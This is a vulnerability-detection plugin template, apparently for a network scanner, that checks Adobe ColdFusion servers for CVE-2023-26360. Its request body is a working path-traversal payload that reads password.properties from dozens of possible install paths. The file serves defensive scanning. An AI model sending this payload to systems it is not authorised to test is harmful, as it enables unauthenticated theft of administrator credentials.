# proto-file: proto/templated_plugin.proto
# proto-message: TemplatedPlugin

###############
# PLUGIN INFO #
###############

info: {
  type: VULN_DETECTION
  name: "Adobe_ColdFusion_CVE_2023_26360"
  author: "Robert Dick (robert@doyensec.com) templated version "
  " (some modifications made from Java version) "
  "jimmy-ly00 for original Java version. "

  version: "1.1"
}

finding: {
  main_id: {
    publisher: "GOOGLE"
    value: "CVE-2023-26360"
  }
  related_id: {
    publisher: "CVE"
    value: "CVE-2023-26360"
  }
  title: "Adobe ColdFusion Unauthenticated Arbitrary Read and Remote Code Execution"
  description: 
    "Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and"
    " earlier) are affected by an Improper Access Control vulnerability that"
    " could result in unauthenticated file read and arbitrary code execution"
    " in the context of the current user. Exploitation of this issue does not"
    " require user interaction."
  recommendation:
    "For Adobe ColdFusion 2018, ugrade to version Update 16 or higher"
    "For Adobe ColdFusion 2021, upgrade to version Update 6 or higher"
  severity: CRITICAL
}

###########
# ACTIONS #
###########

# One simple request that tests several local file read paths

actions: {
  name: "trigger_vuln"
  http_request: {
    method: POST
    uri: "/{{ VULN_PATH }}"
    headers: [
      {
        name: "Content-Type" value: "application/x-www-form-urlencoded"
      }
    ]
    data: "{{ REQ_BODY }}"
    response: {
      http_status: 200
      expect_all: {
        conditions: [
          { body: {} contains: "{{ COLDFUSION_FINGERPRINT }}"},
          { body: {} contains: "{{ VULN_RES_BODY }}"}
        ]
      }
    }
  }
}

#############
# WORKFLOWS #
#############

workflows: {
  
  variables: [

    # this fingerprints coldfusion so that we know it's not some other service returning a password string
    { name: "COLDFUSION_FINGERPRINT" value: "</wddxPacket>"},

    # password.properties will contain this
    { name: "VULN_RES_BODY" value: "password="},

    { name: "VULN_PATH" value: "CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"},

    # Large request body to try a lot of potential paths for the password.properties file to be
    { 
      name: "REQ_BODY" 
      value: 
        "_variables={\"a\":[{\"_metadata\":{\"classname\":\"../../../../../../"
        "opt/coldfusion/cfusion/lib/password.properties\"}},{\"_metadata\":{\"c"
        "lassname\":\"../../../../../../opt/ColdFusion/cfusion/lib/password.pro"
        "perties\"}},{\"_metadata\":{\"classname\":\"../../../../../../opt/Cold"
        "Fusion8/cfusion/lib/password.properties\"}},{\"_metadata\":{\"classnam"
        "e\":\"../../../../../../opt/coldfusion8/cfusion/lib/password.propertie"
        "s\"}},{\"_metadata\":{\"classname\":\"../../../../../../opt/coldfusion"
        "9/cfusion/lib/password.properties\"}},{\"_metadata\":{\"classname\":\""
        "../../../../../../opt/ColdFusion9/cfusion/lib/password.properties\"}},"
        "{\"_metadata\":{\"classname\":\"../../../../../../opt/coldfusion10/cfu"
        "sion/lib/password.properties\"}},{\"_metadata\":{\"classname\":\"../.."
        "/../../../../opt/ColdFusion10/cfusion/lib/password.properties\"}},{\"_"
        "metadata\":{\"classname\":\"../../../../../../opt/coldfusion11/cfusion"
        "/lib/password.properties\"}},{\"_metadata\":{\"classname\":\"../../../"
        "../../../opt/ColdFusion11/cfusion/lib/password.properties\"}},{\"_meta"
        "data\":{\"classname\":\"../../../../../../opt/coldfusion2016/cfusion/l"
        "ib/password.properties\"}},{\"_metadata\":{\"classname\":\"../../../.."
        "/../../opt/ColdFusion2016/cfusion/lib/password.properties\"}},{\"_meta"
        "data\":{\"classname\":\"../../../../../../opt/coldfusion2018/cfusion/l"
        "ib/password.properties\"}},{\"_metadata\":{\"classname\":\"../../../.."
        "/../../opt/ColdFusion2018/cfusion/lib/password.properties\"}},{\"_meta"
        "data\":{\"classname\":\"../../../../../../opt/coldfusion2021/cfusion/l"
        "ib/password.properties\"}},{\"_metadata\":{\"classname\":\"../../../.."
        "/../../opt/ColdFusion2021/cfusion/lib/password.properties\"}},{\"_meta"
        "data\":{\"classname\":\"../../../../../../opt/coldfusion2022/cfusion/l"
        "ib/password.properties\"}},{\"_metadata\":{\"classname\":\"../../../.."
        "/../../opt/ColdFusion2021/cfusion/lib/password.properties\"}},{\"_meta"
        "data\":{\"classname\":\"../../../../../../opt/coldfusion2023/cfusion/l"
        "ib/password.properties\"}},{\"_metadata\":{\"classname\":\"../../../.."
        "/../../opt/ColdFusion2023/cfusion/lib/password.properties\"}},{\"_meta"
        "data\":{\"classname\":\"../../../../../../coldfusion/cfusion/lib/passw"
        "ord.properties\"}},{\"_metadata\":{\"classname\":\"../../../../../../C"
        "oldFusion/cfusion/lib/password.properties\"}},{\"_metadata\":{\"classn"
        "ame\":\"../../../../../../ColdFusion8/cfusion/lib/password.properties\""
        "}},{\"_metadata\":{\"classname\":\"../../../../../../coldfusion8/cfusi"
        "on/lib/password.properties\"}},{\"_metadata\":{\"classname\":\"../../."
        "./../../../coldfusion9/cfusion/lib/password.properties\"}},{\"_metadat"
        "a\":{\"classname\":\"../../../../../../ColdFusion9/cfusion/lib/passwor"
        "d.properties\"}},{\"_metadata\":{\"classname\":\"../../../../../../col"
        "dfusion10/cfusion/lib/password.properties\"}},{\"_metadata\":{\"classn"
        "ame\":\"../../../../../../ColdFusion10/cfusion/lib/password.properties"
        "\"}},{\"_metadata\":{\"classname\":\"../../../../../../coldfusion11/cf"
        "usion/lib/password.properties\"}},{\"_metadata\":{\"classname\":\"../."
        "./../../../../ColdFusion11/cfusion/lib/password.properties\"}},{\"_met"
        "adata\":{\"classname\":\"../../../../../../coldfusion2016/cfusion/lib/"
        "password.properties\"}},{\"_metadata\":{\"classname\":\"../../../../.."
        "/../ColdFusion2016/cfusion/lib/password.properties\"}},{\"_metadata\":"
        "{\"classname\":\"../../../../../../coldfusion2018/cfusion/lib/password"
        ".properties\"}},{\"_metadata\":{\"classname\":\"../../../../../../Cold"
        "Fusion2018/cfusion/lib/password.properties\"}},{\"_metadata\":{\"class"
        "name\":\"../../../../../../coldfusion2021/cfusion/lib/password.propert"
        "ies\"}},{\"_metadata\":{\"classname\":\"../../../../../../ColdFusion20"
        "21/cfusion/lib/password.properties\"}},{\"_metadata\":{\"classname\":\""
        "../../../../../../coldfusion2022/cfusion/lib/password.properties\"}},{"
        "\"_metadata\":{\"classname\":\"../../../../../../ColdFusion2021/cfusio"
        "n/lib/password.properties\"}},{\"_metadata\":{\"classname\":\"../../.."
        "/../../../coldfusion2023/cfusion/lib/password.properties\"}},{\"_metad"
        "ata\":{\"classname\":\"../../../../../../ColdFusion2023/cfusion/lib/pa"
        "ssword.properties\"}},{\"_metadata\":{\"classname\":\"a/../lib/passwor"
        "d.properties\"}},{\"_metadata\":{\"classname\":\"a/../../lib/password."
        "properties\"}},{\"_metadata\":{\"classname\":\"a/../../../lib/password"
        ".properties\"}}]}"
    }
  ]
  actions: [
    "trigger_vuln"
  ]
}
